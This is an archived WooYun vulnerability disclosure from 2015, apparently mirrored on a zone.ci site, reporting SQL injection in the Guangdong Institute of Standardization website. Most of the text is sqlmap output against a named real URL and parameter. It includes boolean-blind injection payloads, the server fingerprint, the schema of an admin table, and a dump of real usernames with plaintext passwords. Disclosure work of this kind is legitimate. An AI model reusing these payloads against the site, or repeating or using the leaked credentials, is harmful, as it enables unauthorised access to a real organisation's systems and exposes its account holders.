乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-06: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开
广东省标准化研究院存在SQL注射导致管理密码泄露
asp的站http://www.gdis.org.cn/label/Lstatute.asp?sign=1&code=ARG001 (GET)我用sqlmap只跑出两个表字典有限
sqlmap identified the following injection points with a total of 80 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9925=9925---sqlmap identified the following injection points with a total of 315 HTTP(s) requests:---Parameter: code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Accesssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[2 tables]+-------+| ics || usern |+-------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: usern[8 columns]+----------+-------------+| Column | Type |+----------+-------------+| code | non-numeric || ics | non-numeric || id | numeric || power | non-numeric || state | non-numeric || tag | non-numeric || username | non-numeric || userpwd | non-numeric |+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: usern[3 entries]+----+-----+-----+------+---------------+-------+----------+---------+| id | tag | ics | code | power | state | username | userpwd |+----+-----+-----+------+---------------+-------+----------+---------+| 1 | l艕 | NULL | NULL | |疟~脽{膭t\x06TX | <blank> | admin | admin || 7 | l艕 | NULL | NULL | N\x00 | <blank> | sonia | sonia || 8 | l艕 | NULL | NULL | N\x00 | <blank> | yegong | 123456 |+----+-----+-----+------+---------------+-------+----------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-05-11 18:22
暂无